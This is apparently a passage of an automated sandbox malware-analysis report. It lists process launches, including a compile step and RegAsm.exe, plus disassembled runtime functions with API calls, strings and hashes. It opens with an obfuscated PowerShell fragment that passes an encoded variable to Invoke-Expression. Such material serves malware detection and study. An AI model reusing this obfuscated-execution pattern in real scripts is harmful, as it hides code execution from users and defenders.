$q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 Invoke-Expression $df2DsdZHRbW8qV1TAmjXySSxhRL6cp5SxYVmagwzlr9rN6yMkqpyFuvWV4Vb1s51FDb2zfjTpkbHi0kLTzmmz7MC3BZFTW7sWHmJv5MFG5IWTndvkKR2Gi18r8zyPez4MjlaeaQnmhg4YqjfY3UJDEmcgOSV6Op25eJaBCRKu4gZCxJAoTamTq0HwIu0StQ8rOzjhJeW
Imagebase:	0xc20000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:06:02
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:06:05
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline"
Imagebase:	0x900000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:06:05
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8A4.tmp" "c:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP"
Imagebase:	0x6b0000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:06:05
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Imagebase:	0x920000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	10.3%
Signature Coverage:	8.1%
Total number of Nodes:	555
Total number of Limit Nodes:	36

Executed Functions

Function 00B75BF0 Relevance: 70.7, APIs: 27, Strings: 13, Instructions: 675
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00C73958,00000004,00000004,00000000,?,?,00B75FAE,?,00710000,?,?,00000000), ref: 00B75C01
GetTickCount.KERNEL32 ref: 00B75C0B
VirtualProtect.KERNELBASE(00C73958,00000004,00000000,00000000,?,?,00B75FAE,?,00710000,?,?,00000000), ref: 00B75C33
GetSystemInfo.KERNELBASE(00DAB198,BBFE6088,00000000,?,00000000), ref: 00B75CFC
SetConsoleCtrlHandler.KERNEL32(00B75B20,00000001,?,00000000), ref: 00B75D1D
GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00B75D28
GetProcAddress.KERNEL32(00000000,InitializeContext2), ref: 00B75D34
GetModuleHandleW.KERNEL32(ntdll.dll,?,00000000), ref: 00B75D44
GetProcAddress.KERNEL32(00000000,RtlRestoreContext), ref: 00B75D56
InitializeCriticalSection.KERNEL32(00DAAF00,?,00000000), ref: 00B75DA4

Strings

EnsureRtlFunctions(), xrefs: 00B7601D
===================EEStartup Completed===================, xrefs: 00B76490
===================EEStartup Starting===================, xrefs: 00B75FF6
RtlRestoreContext, xrefs: 00B75D50
g_pConfig->sync(), xrefs: 00B76065, 00B76084
InitializeContext2, xrefs: 00B75D2E
kernel32.dll, xrefs: 00B75D23
EX_RETHROW line %d, xrefs: 00B76616
GC heap initialization failed with error 0x%08X, xrefs: 00B7634B
ntdll.dll, xrefs: 00B75D3F
%s completed, xrefs: 00B76022, 00B76089
%s failed with code %x, xrefs: 00B7606A
Returned successfully from InitThreadManager, xrefs: 00B75EA9

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual$ConsoleCountCriticalCtrlHandlerInfoInitializeSectionSystemTick
String ID: %s completed$%s failed with code %x$===================EEStartup Completed===================$===================EEStartup Starting===================$EX_RETHROW line %d$EnsureRtlFunctions()$GC heap initialization failed with error 0x%08X$InitializeContext2$Returned successfully from InitThreadManager$RtlRestoreContext$g_pConfig->sync()$kernel32.dll$ntdll.dll
API String ID: 1537217695-3323499670
Opcode ID: 59e5b9cd909727411291ac3d4a1a31963695d61cc8c45a4a63f76c9f7eca6b64
Instruction ID: d4397cd8376f5ad0e72024ce04e854354195d6fad8d8c2b0fa1ed01ed58dbe33
Opcode Fuzzy Hash: 59e5b9cd909727411291ac3d4a1a31963695d61cc8c45a4a63f76c9f7eca6b64
Instruction Fuzzy Hash: 2542AEB0A04344EFDB14EFA8EC56B6E7BB0EB45704F108159F419E7392EBB499448B72

Function 008278C0 Relevance: 49.8, APIs: 10, Strings: 18, Instructions: 788memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(BBFE6088,?,00000000,00004000), ref: 0097480E
Part of subcall function 009747A0: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 00974822
Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097482E
Part of subcall function 009747A0: HeapFree.KERNEL32(00000000,00000000), ref: 00974852

HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00827AEC
wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,00000000,?,00000000), ref: 00827B7E
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00827C8A
_wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,debug,?,00000000), ref: 00827CD4
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00827D05
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00827E02
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000), ref: 00828081
wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,0000000A), ref: 00828097
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 008280A3

Part of subcall function 00974BE0: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,00000000,00DB6118,00000000,008281BC,?,00000000), ref: 00974C0E

HeapFree.KERNEL32(00000000,?), ref: 008284AB

Strings

StartupDelayMS, xrefs: 00828071
true, xrefs: 00827977
System.Runtime.TieredCompilation, xrefs: 00828142
ReadyToRunExcludeList, xrefs: 00827D7C
System.Runtime.TieredPGO, xrefs: 00828291
System.Runtime.TieredCompilation.CallCountingDelayMs, xrefs: 008281E1
RestrictedGCStressExe, xrefs: 00827A0C
System.GC.LOHThreshold, xrefs: 00827B6B
System.Runtime.InteropServices.BuiltInComInterop.IsSupported, xrefs: 0082805C
System.Runtime.TieredCompilation.QuickJitForLoops, xrefs: 00828172
System.GC.Concurrent, xrefs: 00827963
ZapBBInstr, xrefs: 00827E3B
debug, xrefs: 00827CCE
LogCCWRefCountChange, xrefs: 00828006
System.Runtime.TieredCompilation.CallCountThreshold, xrefs: 008281AC
System.Runtime.TieredCompilation.QuickJit, xrefs: 0082815C
ZapBBInstrDir, xrefs: 00827EA4
MODIFIABLE_ASSEMBLIES, xrefs: 00827C4C

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$_errnowcstoul$_wcsicmp
String ID: LogCCWRefCountChange$MODIFIABLE_ASSEMBLIES$ReadyToRunExcludeList$RestrictedGCStressExe$StartupDelayMS$System.GC.Concurrent$System.GC.LOHThreshold$System.Runtime.InteropServices.BuiltInComInterop.IsSupported$System.Runtime.TieredCompilation$System.Runtime.TieredCompilation.CallCountThreshold$System.Runtime.TieredCompilation.CallCountingDelayMs$System.Runtime.TieredCompilation.QuickJit$System.Runtime.TieredCompilation.QuickJitForLoops$System.Runtime.TieredPGO$ZapBBInstr$ZapBBInstrDir$debug$true
API String ID: 3256802023-3081926669
Opcode ID: cf3f7d274a1a662c8feee62222393ccf451bcd8b31afc198a0295af7dd10bc0f
Instruction ID: c9ded67e4e3a147c2ce0a014a8a4842768a915ca7fe63ba1cfcca9d08b9b831d
Opcode Fuzzy Hash: cf3f7d274a1a662c8feee62222393ccf451bcd8b31afc198a0295af7dd10bc0f
Instruction Fuzzy Hash: C572DD70A01665DBDB24DF24D8457EABBB2FF85300F0481A9D80DDB392DB749E84CB92

Function 009AEA80 Relevance: 37.4, APIs: 18, Strings: 3, Instructions: 641
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,System.Private.CoreLib.dll,0000001A,00000004,00000000), ref: 009AEB78

Part of subcall function 00729930: _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000002F,?), ref: 00729AA0

wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,System.Private.CoreLib,00000016,00000004,00000000,?,00000000,?,?,?,?,?,?,?,?), ref: 009AEE61
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,-00000002,00000004,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009AEF1D
HeapFree.KERNEL32(00000000,?,?,00000001,?,?,?), ref: 009AF157
HeapFree.KERNEL32(00000000,?,?,00000001,?,?,?), ref: 009AF185
HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?), ref: 009AF1EE
HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?), ref: 009AF214
HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00000001,?,?,?), ref: 009AF343
HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00000001,?,?,?), ref: 009AF369
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009AF3AB
HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009AF3D1
HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009AF462
HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009AF488
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009AF4B3
HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009AF4DB
HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009AF501
HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009AF527
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009AF555

Strings

System.Private.CoreLib, xrefs: 009AEE53
TRUSTED_PLATFORM_ASSEMBLIES, xrefs: 009AEE6E
System.Private.CoreLib.dll, xrefs: 009AEB6A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap$wcscpy_s$_wcsnicmp
String ID: System.Private.CoreLib$System.Private.CoreLib.dll$TRUSTED_PLATFORM_ASSEMBLIES
API String ID: 3863164608-3418895618
Opcode ID: 3e3cfb1e240b50669ff98269a0835ba29a49cdd454f205f8027684ead42ab2ba
Instruction ID: 46d71e6293549f2b4a746942516c26e9aee8dc8749447692667bff534c56d1b0
Opcode Fuzzy Hash: 3e3cfb1e240b50669ff98269a0835ba29a49cdd454f205f8027684ead42ab2ba
Instruction Fuzzy Hash: E4625A70900268DAEB20DB64CD597EDBBF4BF46304F1482E9E488A7291DF759E84CF90

Function 009AC080 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 115
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeA.KERNEL32(00000000,40080003,00000008,000000FF,00004000,00004000,00000000,00000000), ref: 009AC0E5
GetLastError.KERNEL32 ref: 009AC0FE
GetCurrentProcess.KERNEL32(00000118,00000000,00000000,00000002), ref: 009AC121
GetCurrentProcess.KERNEL32(?,00000000), ref: 009AC12E
DuplicateHandle.KERNELBASE(00000000), ref: 009AC135
GetLastError.KERNEL32 ref: 009AC143

Strings

A client process failed to connect., xrefs: 009AC1AB
Cannot call Listen on a client connection, xrefs: 009AC095
Failed to ownership sentinel., xrefs: 009AC14A
Failed to create an instance of a named pipe., xrefs: 009AC105
Failed to create overlap event, xrefs: 009AC174

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CurrentErrorLastProcess$CreateDuplicateHandleNamedPipe
String ID: A client process failed to connect.$Cannot call Listen on a client connection$Failed to create an instance of a named pipe.$Failed to create overlap event$Failed to ownership sentinel.
API String ID: 1242093035-1870640685
Opcode ID: 8aa94b97121133b5c250938914f65e30feaa47a4bdd320c1e06b35848d6a6ad7
Instruction ID: 29045c4a5f29a73ba5d00f065f3c6e6f29ce5205d74385f6fc2fe0349bda7a7b
Opcode Fuzzy Hash: 8aa94b97121133b5c250938914f65e30feaa47a4bdd320c1e06b35848d6a6ad7
Instruction Fuzzy Hash: E531C2B17487617FEB351735BC4EBEDB71CAB46B21F104212FA22D91E1CBA05D818AE1

Function 009B3200 Relevance: 12.7, APIs: 8, Instructions: 685
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0071F1C0: HeapFree.KERNEL32(00000000,?,80131623,?,?,00000002), ref: 0071F1FD

HeapFree.KERNEL32(00000000,?,?,?,0000003B,?), ref: 009B3C28
HeapFree.KERNEL32(00000000,?,?,?,?,?,0000003B,?), ref: 009B3CA6

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1512f490f7c45fb5f0c85fb82601c41d0383dc2eb56691878ee927e635260b75
Instruction ID: 30aa28970479fd89ff79330b6677eef11f89394a6219a46ac8083d6dc68a4457
Opcode Fuzzy Hash: 1512f490f7c45fb5f0c85fb82601c41d0383dc2eb56691878ee927e635260b75
Instruction Fuzzy Hash: 2E6259B094126D9BDB24CF29CD897EDBBB5AF54310F2482E9E449A7290DB749F84CF40

Function 00713220 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 446
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(BBFE6088,?,00000000,00004000), ref: 0097480E
Part of subcall function 009747A0: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 00974822
Part of subcall function 009747A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0097482E
Part of subcall function 009747A0: HeapFree.KERNEL32(00000000,00000000), ref: 00974852

HeapFree.KERNEL32(00000000,?), ref: 00713310

Part of subcall function 0096F3E0: GetProcessHeap.KERNEL32(00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?,00000002), ref: 0096F3EC
Part of subcall function 0096F3E0: HeapAlloc.KERNEL32(03400000,00000000,?,00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?), ref: 0096F408

wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000018,00000017,00000018), ref: 007133BA
HeapFree.KERNEL32(00000000,00C731C4,00000002,00000001,00000004,00000000,00DB2D8C,00000018), ref: 00713475
InitializeCriticalSection.KERNEL32(00000008,00000018,?,BBFE6088,034124C8,00000000), ref: 007135FA

Strings

RCC, xrefs: 0071351F
System.Private.CoreLib.dll, xrefs: 00713488

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$Free$_errno$AllocCriticalInitializeProcessSectionwcsncpy_swcstoul
String ID: RCC$System.Private.CoreLib.dll
API String ID: 974766027-1196381869
Opcode ID: e96ca31a666636479ada2a7bfde9665b37c55d1a4242c0111407a8796b76aadd
Instruction ID: 538fef770181f16a089c65268c52390723f73669d40befb29a2b6c40aea46b72
Opcode Fuzzy Hash: e96ca31a666636479ada2a7bfde9665b37c55d1a4242c0111407a8796b76aadd
Instruction Fuzzy Hash: 20F1BAB0A00305DFDB14DF69C895BAEBBE5EF44310F14816DE81A9B3D1DB79AA44CB90

Function 007EDCE0 Relevance: 9.5, APIs: 4, Strings: 1, Instructions: 770COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(000000AC,BBFE6088,00C6B4E4,00000000,?), ref: 007EDD2D

Part of subcall function 0096F380: GetProcessHeap.KERNEL32(?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002,00000002), ref: 0096F38C
Part of subcall function 0096F380: RtlAllocateHeap.NTDLL(03400000,00000000,00000002,?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002), ref: 0096F3AA

Part of subcall function 0096F3E0: GetProcessHeap.KERNEL32(00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?,00000002), ref: 0096F3EC
Part of subcall function 0096F3E0: HeapAlloc.KERNEL32(03400000,00000000,?,00000002,0071FF2B,00000002,?,00000002,0071F295,80131623,?,?), ref: 0096F408

Part of subcall function 008A8700: SleepEx.KERNEL32(00000001,00000000), ref: 008A8803
Part of subcall function 008A8700: SwitchToThread.KERNEL32(BBFE6088,00000000), ref: 008A8809

Part of subcall function 007F0A60: _swprintf.LIBCMT ref: 007F0AC4
Part of subcall function 007F0A60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0AD8
Part of subcall function 007F0A60: WriteFile.KERNEL32(?,00000000), ref: 007F0AED
Part of subcall function 007F0A60: _swprintf.LIBCMT ref: 007F0B0D
Part of subcall function 007F0A60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0B21
Part of subcall function 007F0A60: WriteFile.KERNEL32(?,00000000), ref: 007F0B36
Part of subcall function 007F0A60: _swprintf.LIBCMT ref: 007F0B56
Part of subcall function 007F0A60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0B6A
Part of subcall function 007F0A60: WriteFile.KERNEL32(?,00000000), ref: 007F0B7F
Part of subcall function 007F0A60: _swprintf.LIBCMT ref: 007F0B9F
Part of subcall function 007F0A60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 007F0BB3
Part of subcall function 007F0A60: WriteFile.KERNEL32(?,00000000), ref: 007F0BC8

VirtualFree.KERNEL32(?,00000000,00008000,?,BBFE6088,00000000,00001000,00000000), ref: 007EE646
DeleteCriticalSection.KERNEL32(?,?,?,BBFE6088,00000000,00001000,00000000), ref: 007EE66F
DeleteCriticalSection.KERNEL32(?,?,?,BBFE6088,00000000,00001000,00000000), ref: 007EE6A9

Strings

VirtualCallStubManagerManager::AddStubManager - 0x%p (vptr 0x%p), xrefs: 007EE355

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FileHeapWrite_swprintfstrlen$CriticalSection$DeleteProcess$AllocAllocateFreeInitializeSleepSwitchThreadVirtual
String ID: VirtualCallStubManagerManager::AddStubManager - 0x%p (vptr 0x%p)
API String ID: 3254498693-2064279654
Opcode ID: e7eba537834e416a7a16df4289a93f842867fc89ce0029c416e91bf1628678cc
Instruction ID: be5ae838d9b6b9f8f4e9798c8260e90b595e910d4d122b93f81798bb9eda7d14
Opcode Fuzzy Hash: e7eba537834e416a7a16df4289a93f842867fc89ce0029c416e91bf1628678cc
Instruction Fuzzy Hash: 15626FB0A01245DFDB14CFA9C8957AEBBF0AF48300F14457DE909AB381DB789944CBA1

Function 0096F380 Relevance: 3.0, APIs: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002,00000002), ref: 0096F38C
RtlAllocateHeap.NTDLL(03400000,00000000,00000002,?,0097299A,0000000C,BBFE6088,?,00000002,?,?,00C11AA4,000000FF,?,0097DCAE,00000002), ref: 0096F3AA

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
